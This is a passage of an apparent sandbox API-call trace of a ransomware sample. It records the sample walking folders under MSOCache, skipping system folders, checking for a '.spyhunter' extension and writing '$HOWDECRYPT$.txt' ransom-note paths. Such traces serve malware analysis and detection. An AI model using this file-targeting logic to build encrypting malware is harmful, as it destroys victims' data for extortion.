Flags=0x8, Size=0xe2) returned 0x328558 [0084.546] GetProcessHeap () returned 0x2c0000 [0084.546] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5b0) returned 0x32fc28 [0084.546] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.546] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="Windows") returned -1 [0084.546] lstrlenW (lpString="Windows") returned 7 [0084.546] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="$Recycle.bin") returned 1 [0084.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.546] lstrcmpiW (lpString1="PrjPrrWW.cab", lpString2="System Volume Information") returned -1 [0084.546] lstrlenW (lpString="System Volume Information") returned 25 [0084.546] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0084.546] StrStrIW (lpFirst="PrjPrrWW.cab", lpSrch=".spyhunter") returned 0x0 [0084.546] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.546] lstrcmpW (lpString1="PrjPrrWW.cab", lpString2="_uninstalling_.png") returned 1 [0084.546] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjPrrWW.cab") returned 79 [0084.546] GetProcessHeap () returned 0x2c0000 [0084.546] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3271c8 [0084.546] GetProcessHeap () returned 0x2c0000 [0084.546] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5b8) returned 0x32fc28 [0084.546] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.546] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0084.546] lstrlenW (lpString="Windows") returned 7 [0084.546] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0084.546] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.546] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0084.546] lstrlenW (lpString="System Volume Information") returned 25 [0084.546] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.547] StrStrIW (lpFirst="setup.exe", lpSrch=".spyhunter") returned 0x0 [0084.547] lstrcmpW (lpString1="setup.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.547] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0084.547] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.547] GetProcessHeap () returned 0x2c0000 [0084.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3272b0 [0084.547] GetProcessHeap () returned 0x2c0000 [0084.547] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5c0) returned 0x32fc28 [0084.547] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.547] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0084.547] lstrlenW (lpString="Windows") returned 7 [0084.547] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0084.547] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.547] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0084.547] lstrlenW (lpString="System Volume Information") returned 25 [0084.547] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.547] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0084.547] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.547] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0084.547] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.547] GetProcessHeap () returned 0x2c0000 [0084.547] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x327398 [0084.547] GetProcessHeap () returned 0x2c0000 [0084.547] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5c8) returned 0x32fc28 [0084.547] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0084.547] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0084.548] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.548] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0084.548] GetProcessHeap () returned 0x2c0000 [0084.548] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328648 [0084.548] GetProcessHeap () returned 0x2c0000 [0084.548] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5d0) returned 0x32fc28 [0084.548] GetProcessHeap () returned 0x2c0000 [0084.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0084.549] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0084.549] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0084.549] lstrlenW (lpString="Windows") returned 7 [0084.549] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0084.549] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.549] lstrcmpiW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0084.549] lstrlenW (lpString="System Volume Information") returned 25 [0084.549] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned 66 [0084.549] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0084.549] lstrcmpW (lpString1="{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0084.549] GetProcessHeap () returned 0x2c0000 [0084.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0084.550] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*") returned 68 [0084.550] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0084.744] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.744] lstrlenW (lpString="Windows") returned 7 [0084.744] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.744] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.744] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.744] lstrlenW (lpString="System Volume Information") returned 25 [0084.744] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.744] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.744] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0084.744] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.744] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0084.744] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\.") returned 68 [0084.744] GetProcessHeap () returned 0x2c0000 [0084.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x324128 [0084.744] GetProcessHeap () returned 0x2c0000 [0084.745] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5c0) returned 0x32fc28 [0084.745] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.745] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.745] lstrlenW (lpString="Windows") returned 7 [0084.745] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.745] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.745] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.745] lstrlenW (lpString="System Volume Information") returned 25 [0084.745] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.745] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.745] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.745] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0084.745] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.745] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0084.745] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\..") returned 69 [0084.745] GetProcessHeap () returned 0x2c0000 [0084.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x324200 [0084.745] GetProcessHeap () returned 0x2c0000 [0084.745] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5c8) returned 0x32fc28 [0084.745] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.745] lstrcmpiW (lpString1="Office32WW.msi", lpString2="Windows") returned -1 [0084.745] lstrlenW (lpString="Windows") returned 7 [0084.745] lstrcmpiW (lpString1="Office32WW.msi", lpString2="$Recycle.bin") returned 1 [0084.745] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.745] lstrcmpiW (lpString1="Office32WW.msi", lpString2="System Volume Information") returned -1 [0084.745] lstrlenW (lpString="System Volume Information") returned 25 [0084.745] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.745] StrStrIW (lpFirst="Office32WW.msi", lpSrch=".spyhunter") returned 0x0 [0084.745] lstrcmpW (lpString1="Office32WW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.745] lstrcmpW (lpString1="Office32WW.msi", lpString2="_uninstalling_.png") returned 1 [0084.745] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 81 [0084.745] GetProcessHeap () returned 0x2c0000 [0084.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328648 [0084.746] GetProcessHeap () returned 0x2c0000 [0084.746] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5d0) returned 0x32fc28 [0084.746] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.746] lstrcmpiW (lpString1="Office32WW.xml", lpString2="Windows") returned -1 [0084.746] lstrlenW (lpString="Windows") returned 7 [0084.746] lstrcmpiW (lpString1="Office32WW.xml", lpString2="$Recycle.bin") returned 1 [0084.746] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.746] lstrcmpiW (lpString1="Office32WW.xml", lpString2="System Volume Information") returned -1 [0084.746] lstrlenW (lpString="System Volume Information") returned 25 [0084.746] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.746] StrStrIW (lpFirst="Office32WW.xml", lpSrch=".spyhunter") returned 0x0 [0084.746] lstrcmpW (lpString1="Office32WW.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.746] lstrcmpW (lpString1="Office32WW.xml", lpString2="_uninstalling_.png") returned 1 [0084.746] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0084.746] GetProcessHeap () returned 0x2c0000 [0084.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x328738 [0084.746] GetProcessHeap () returned 0x2c0000 [0084.746] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5d8) returned 0x32fc28 [0084.746] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.746] lstrcmpiW (lpString1="ose.exe", lpString2="Windows") returned -1 [0084.746] lstrlenW (lpString="Windows") returned 7 [0084.746] lstrcmpiW (lpString1="ose.exe", lpString2="$Recycle.bin") returned 1 [0084.746] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.746] lstrcmpiW (lpString1="ose.exe", lpString2="System Volume Information") returned -1 [0084.746] lstrlenW (lpString="System Volume Information") returned 25 [0084.746] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.746] StrStrIW (lpFirst="ose.exe", lpSrch=".spyhunter") returned 0x0 [0084.746] lstrcmpW (lpString1="ose.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.746] lstrcmpW (lpString1="ose.exe", lpString2="_uninstalling_.png") returned 1 [0084.746] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\ose.exe") returned 74 [0084.746] GetProcessHeap () returned 0x2c0000 [0084.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd6) returned 0x32f950 [0084.746] GetProcessHeap () returned 0x2c0000 [0084.746] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5e0) returned 0x32fc28 [0084.747] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.747] lstrcmpiW (lpString1="osetup.dll", lpString2="Windows") returned -1 [0084.747] lstrlenW (lpString="Windows") returned 7 [0084.747] lstrcmpiW (lpString1="osetup.dll", lpString2="$Recycle.bin") returned 1 [0084.747] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.747] lstrcmpiW (lpString1="osetup.dll", lpString2="System Volume Information") returned -1 [0084.747] lstrlenW (lpString="System Volume Information") returned 25 [0084.747] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.747] StrStrIW (lpFirst="osetup.dll", lpSrch=".spyhunter") returned 0x0 [0084.747] lstrcmpW (lpString1="osetup.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.747] lstrcmpW (lpString1="osetup.dll", lpString2="_uninstalling_.png") returned 1 [0084.747] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 77 [0084.747] GetProcessHeap () returned 0x2c0000 [0084.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x326c58 [0084.747] GetProcessHeap () returned 0x2c0000 [0084.747] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5e8) returned 0x32fc28 [0084.747] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.747] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="Windows") returned -1 [0084.747] lstrlenW (lpString="Windows") returned 7 [0084.747] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="$Recycle.bin") returned 1 [0084.747] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.747] lstrcmpiW (lpString1="OWOW32WW.cab", lpString2="System Volume Information") returned -1 [0084.747] lstrlenW (lpString="System Volume Information") returned 25 [0084.747] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.747] StrStrIW (lpFirst="OWOW32WW.cab", lpSrch=".spyhunter") returned 0x0 [0084.747] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.747] lstrcmpW (lpString1="OWOW32WW.cab", lpString2="_uninstalling_.png") returned 1 [0084.747] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 79 [0084.747] GetProcessHeap () returned 0x2c0000 [0084.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326e28 [0084.747] GetProcessHeap () returned 0x2c0000 [0084.747] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5f0) returned 0x32fc28 [0084.747] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.747] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0084.747] lstrlenW (lpString="Windows") returned 7 [0084.747] lstrcmpiW (lpString1="PidGenX.dll", lpString2="$Recycle.bin") returned 1 [0084.748] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.748] lstrcmpiW (lpString1="PidGenX.dll", lpString2="System Volume Information") returned -1 [0084.748] lstrlenW (lpString="System Volume Information") returned 25 [0084.748] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.748] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".spyhunter") returned 0x0 [0084.748] lstrcmpW (lpString1="PidGenX.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.748] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0084.748] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0084.748] GetProcessHeap () returned 0x2c0000 [0084.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x327480 [0084.748] GetProcessHeap () returned 0x2c0000 [0084.748] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x5f8) returned 0x32fc28 [0084.748] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.748] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0084.748] lstrlenW (lpString="Windows") returned 7 [0084.748] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$Recycle.bin") returned 1 [0084.748] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.748] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="System Volume Information") returned -1 [0084.748] lstrlenW (lpString="System Volume Information") returned 25 [0084.748] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.748] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".spyhunter") returned 0x0 [0084.748] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.748] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0084.748] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0084.748] GetProcessHeap () returned 0x2c0000 [0084.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x32fa30 [0084.748] GetProcessHeap () returned 0x2c0000 [0084.748] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x600) returned 0x32fc28 [0084.748] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.748] lstrcmpiW (lpString1="setup.exe", lpString2="Windows") returned -1 [0084.749] lstrlenW (lpString="Windows") returned 7 [0084.749] lstrcmpiW (lpString1="setup.exe", lpString2="$Recycle.bin") returned 1 [0084.749] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.749] lstrcmpiW (lpString1="setup.exe", lpString2="System Volume Information") returned -1 [0084.749] lstrlenW (lpString="System Volume Information") returned 25 [0084.749] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.749] StrStrIW (lpFirst="setup.exe", lpSrch=".spyhunter") returned 0x0 [0084.749] lstrcmpW (lpString1="setup.exe", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.749] lstrcmpW (lpString1="setup.exe", lpString2="_uninstalling_.png") returned 1 [0084.749] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 76 [0084.749] GetProcessHeap () returned 0x2c0000 [0084.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x327568 [0084.749] GetProcessHeap () returned 0x2c0000 [0084.749] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x608) returned 0x32fc28 [0084.749] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.749] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0084.749] lstrlenW (lpString="Windows") returned 7 [0084.749] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0084.749] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.749] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0084.749] lstrlenW (lpString="System Volume Information") returned 25 [0084.749] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.749] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0084.749] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.749] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0084.749] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0084.749] GetProcessHeap () returned 0x2c0000 [0084.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x327650 [0084.749] GetProcessHeap () returned 0x2c0000 [0084.749] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x610) returned 0x32fc28 [0084.749] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.749] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="Windows") returned -1 [0084.749] lstrlenW (lpString="Windows") returned 7 [0084.749] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="$Recycle.bin") returned 1 [0084.750] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.750] lstrcmpiW (lpString1="VisiorWW.cab", lpString2="System Volume Information") returned 1 [0084.750] lstrlenW (lpString="System Volume Information") returned 25 [0084.750] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0084.750] StrStrIW (lpFirst="VisiorWW.cab", lpSrch=".spyhunter") returned 0x0 [0084.750] lstrcmpW (lpString1="VisiorWW.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.750] lstrcmpW (lpString1="VisiorWW.cab", lpString2="_uninstalling_.png") returned 1 [0084.750] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 79 [0084.750] GetProcessHeap () returned 0x2c0000 [0084.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x327738 [0084.750] GetProcessHeap () returned 0x2c0000 [0084.750] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x618) returned 0x32fc28 [0084.750] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.750] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="Windows") returned -1 [0084.750] lstrlenW (lpString="Windows") returned 7 [0084.750] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="$Recycle.bin") returned 1 [0084.750] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.750] lstrcmpiW (lpString1="VisiorWW.msi", lpString2="System Volume Information") returned 1 [0084.750] lstrlenW (lpString="System Volume Information") returned 25 [0084.750] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0084.750] StrStrIW (lpFirst="VisiorWW.msi", lpSrch=".spyhunter") returned 0x0 [0084.750] lstrcmpW (lpString1="VisiorWW.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0084.750] lstrcmpW (lpString1="VisiorWW.msi", lpString2="_uninstalling_.png") returned 1 [0084.750] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.msi") returned 79 [0084.750] GetProcessHeap () returned 0x2c0000 [0084.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x327820 [0084.750] GetProcessHeap () returned 0x2c0000 [0084.750] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32fc28, Size=0x620) returned 0x32fc28 [0084.750] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0084.750] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="Windows") returned -1 [0084.750] lstrlenW (lpString="Windows") returned 7 [0084.750] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="$Recycle.bin") returned 1 [0084.751] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.751] lstrcmpiW (lpString1="VisiorWW.xml", lpString2="System Volume Information") returned 1 [0084.751] lstrlenW (lpString="System Volume Information") returned 25 [0084.751] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.xml") returned 79 [0084.751] StrStrIW (lpFirst="VisiorWW.xml", lpSrch=".spyhunter") returned 0x0 [0084.751] lstrcmpW 